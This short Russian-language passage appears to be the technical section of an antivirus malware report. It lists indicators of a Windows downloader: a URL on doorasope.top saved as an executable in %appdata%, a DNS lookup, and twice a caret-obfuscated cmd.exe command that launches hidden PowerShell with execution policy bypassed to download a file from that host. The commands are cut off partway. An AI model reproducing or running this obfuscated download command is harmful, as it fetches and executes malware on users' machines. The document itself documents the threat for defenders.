Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^w^E^Rsh^Ell.^eX^e -^exEc^utI^ONpOliCy B^YpAsS -^NOP^ROf^ILe -^windOWS^tyl^E H^id^DEN^ (NEw^-ob^jEc^T SYS^Tem.NEt.^w^eBcli^en^T)^.^D^Ow^n^loAd^FI^LE('http://www.doorasope.t...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "pO^w^E^Rsh^Ell.^eX^e -^exEc^utI^ONpOliCy B^YpAsS -^NOP^ROf^ILe -^windOWS^tyl^E H^id^DEN^ (NEw^-ob^jEc^T SYS^Tem.NEt.^w^eBcli^en^T)^.^D^Ow^n^loAd^FI^LE('http://www.doorasope.t...' (со скрытым окном)